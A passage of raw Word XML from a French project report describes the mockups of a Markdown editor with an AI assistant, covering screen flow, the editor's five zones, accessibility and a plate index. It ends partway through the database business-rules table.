    <w:bookmarkStart w:id="55" w:name="X47c2ea4dbca0e2a53579dc14df00498dc1de799"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Schéma d'enchaînement des maquettes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5688000" cy="4469143"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image9.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5688000" cy="4469143"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Enchaînement des écrans — planche W-09, reprise en annexe § 12.1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t>La version mise au propre de ce schéma constitue la planche W-09 (annexe § 12.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trois points de ce schéma méritent d'être soulignés, car ils traduisent des décisions de conception et non de simples liens :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2009"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le composant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Nav</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">est le point de navigation permanent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de la zone authentifiée. L'entrée vers le back-office n'y apparaît que si le rôle de l'utilisateur est</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; la garde</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requiresAdmin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>du routeur double ce masquage, et le backend revérifie le rôle en base à chaque appel (§ 5.2). Masquer un lien n'est pas une mesure de sécurité, c'est un confort d'usage — le contrôle réel est côté serveur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2009"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">La création de document converge vers l'écran d'édition.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/documents/nouveau</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">bascule sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/documents/:id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dès le premier enregistrement, ce qui évite un écran de création distinct à maintenir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2009"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le panneau IA est une surcouche modale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, pas un écran. L'utilisateur ne quitte jamais son texte : il voit la proposition à côté de son contenu et décide de l'insérer ou de remplacer. C'est ce qui répond à l'exigence du cahier des charges d'un « résultat affiché de manière différenciée ».</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="55"/>
    <w:bookmarkStart w:id="56" w:name="Xc9a99ad69208e934e50bad96da941fcaa55f37c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Maquette de l'écran le plus représentatif : l'éditeur de document</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'éditeur est la fonctionnalité centrale du produit. Sa maquette (planche W-06) se décompose en cinq zones.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">① En-tête</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— retour à la liste, surtitre d'état, et les trois métadonnées du document sur une seule ligne : titre, statut (brouillon / à relire / terminé) et dossier de rattachement. Les régler depuis l'écran de rédaction évite un aller-retour vers un écran de propriétés séparé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">② Indicateur d'enregistrement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>— trois états possibles : « Enregistrement… », « ✓ Enregistré automatiquement », et un message d'échec invitant à enregistrer manuellement. L'emplacement est réservé en permanence dans la mise en page, pour que l'apparition du message ne décale pas le contenu sous lui. Le mécanisme est détaillé en § 7.1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">③ Barre d'outils</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— mise en forme Markdown groupée par nature (emphase, titres, listes, insertions), puis les deux commandes qui ouvrent une surcouche : l'assistant IA et la bascule d'aperçu. La barre porte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">role="toolbar"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">aria-label</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, et chaque bouton un attribut</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">title</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, pour la restitution par lecteur d'écran.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">④ Zone d'édition</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— saisie à gauche, aperçu du rendu à droite, désactivable pour libérer toute la largeur sur petit écran. Le curseur et la sélection reprennent la couleur d'accent, et le focus est matérialisé par un contour de 2 px — critère RGAA 4.1.2 sur la visibilité de la prise de focus. Les boutons « Annuler » et « Enregistrer » sous la zone ne remplacent pas l'enregistrement automatique : ils le doublent d'une action explicite, pour l'utilisateur qui veut la certitude immédiate d'avoir sauvegardé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">⑤ Historique IA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>— section repliable listant les interactions du document : action demandée, contenu avant, contenu après, tokens consommés. C'est la traçabilité exigée au cahier des charges, et elle est aussi ce qui permet à l'utilisateur de revenir sur une proposition acceptée. Elle constitue par ailleurs la base technique de la traçabilité des contenus générés demandée par l'AI Act.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Panneau IA (planche W-07, surcouche modale)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— au clic sur « ✦ IA », une modale propose de choisir l'action (reformuler, corriger, compléter), la portée (sélection ou document entier) et une consigne libre facultative. La proposition du modèle s'affiche dans ce panneau, accompagnée de deux actions explicites : insérer ou remplacer. Aucune modification n'est appliquée au document sans action de l'utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="56"/>
    <w:bookmarkStart w:id="57" w:name="X32fc2094badb51f39d1a36efb0a10d745f2bbbd"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Adaptation aux supports et accessibilité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les maquettes ont été déclinées pour deux points de rupture, mobile d'abord puis écran large. Sur mobile, l'aperçu Markdown passe sous la zone de saisie au lieu d'être à côté, la barre d'outils se replie sur plusieurs lignes, et la navigation principale devient un menu déroulant. Les contenus des pages légales sont contraints à une largeur de lecture maximale pour rester confortables sur grand écran.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Points RGAA 4.1.2 pris en compte dès la maquette : contrastes validés par construction sur la palette, zone de focus visible sur tous les éléments interactifs, ordre de tabulation suivant l'ordre de lecture, libellés explicites sur chaque champ de formulaire, et rôles ARIA sur les composants qui ne sont pas des éléments HTML natifs. L'audit outillé a été mené sur la version 4.1.2, en vigueur, la version 5 étant annoncée pour fin 2026 (§ 9, § 11).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="57"/>
    <w:bookmarkStart w:id="59" w:name="X4d114d2287c569a7764960a6f8a063ccff4af3a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Index des planches</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Les neuf planches figurent en annexe § 12.1. Les captures des écrans réellement implémentés sont présentées en § 7.1 et § 12.2, ce qui permet de confronter la conception et la réalisation.</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Planche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Écran</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Route</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ce qu'elle fixe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-01</w:t>
            </w:r>
          </w:p>
        </w:tc>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Composition de la page d'entrée, place du footer légal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-02</w:t>
            </w:r>
          </w:p>
        </w:tc>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Politique de mot de passe affichée en continu, consentement RGPD explicite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Connexion et récupération</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/login</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/forgot-password</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/reset-password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Parcours de récupération complet, réponse anti-énumération</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-04</w:t>
            </w:r>
          </w:p>
        </w:tc>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Trois compteurs de statut, trois portes d'entrée vers la rédaction, état vide explicite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-05</w:t>
            </w:r>
          </w:p>
        </w:tc>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Colonne dossiers, recherche et filtre statut, pagination serveur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Éditeur de document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/documents/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Les cinq zones de l'écran central, indicateur d'enregistrement, historique IA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Assistant IA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">surcouche de</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/documents/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Action, portée, consigne libre, insérer / remplacer / annuler</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Back-office</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Statistiques globales, édition du rôle et du quota en ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Enchaînement des écrans</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Zones d'accès, gardes de navigation, transitions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="163773FB" w14:textId="36B575CF" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="00F02D2D" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc198828313"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Le</w:t>
      </w:r>
      <w:r w:rsidR="003A2DEC" w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> modèle entités-associations et modèle physique de la base de données</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidR="003A2DEC" w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Règles de gestion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Le modèle découle de huit règles de gestion, tirées du périmètre fonctionnel (§ 2) et des contraintes (§ 5.1)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N°</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Règle de gestion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RG1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Un utilisateur possède zéro, un ou plusieurs dossiers. Un dossier appartient à un et un seul utilisateur.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RG2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Un utilisateur rédige zéro, un ou plusieurs documents. Un document appartient à un et un seul utilisateur.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RG3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Un document est rangé dans au plus un dossier. Un dossier contient zéro, un ou plusieurs documents. Un document peut donc exister sans dossier.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RG4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Un document fait l'objet de zéro, une ou plusieurs interactions IA. Une interaction porte sur un et un seul document, et est déclenchée par un et un seul utilisateur.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RG5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Un utilisateur accorde zéro, un ou plusieurs consentements, chacun typé, daté et horodaté.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RG6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Un utilisateur ouvre zéro, une ou plusieurs sessions. Chaque session porte un refresh token unique, une date d'expiration et un indicateur de révocation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RG7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Un utilisateur formule zéro, une ou plusieurs demandes de réinitialisation de mot de passe. Chacune expire et n'est utilisable qu'une fois.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RG8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
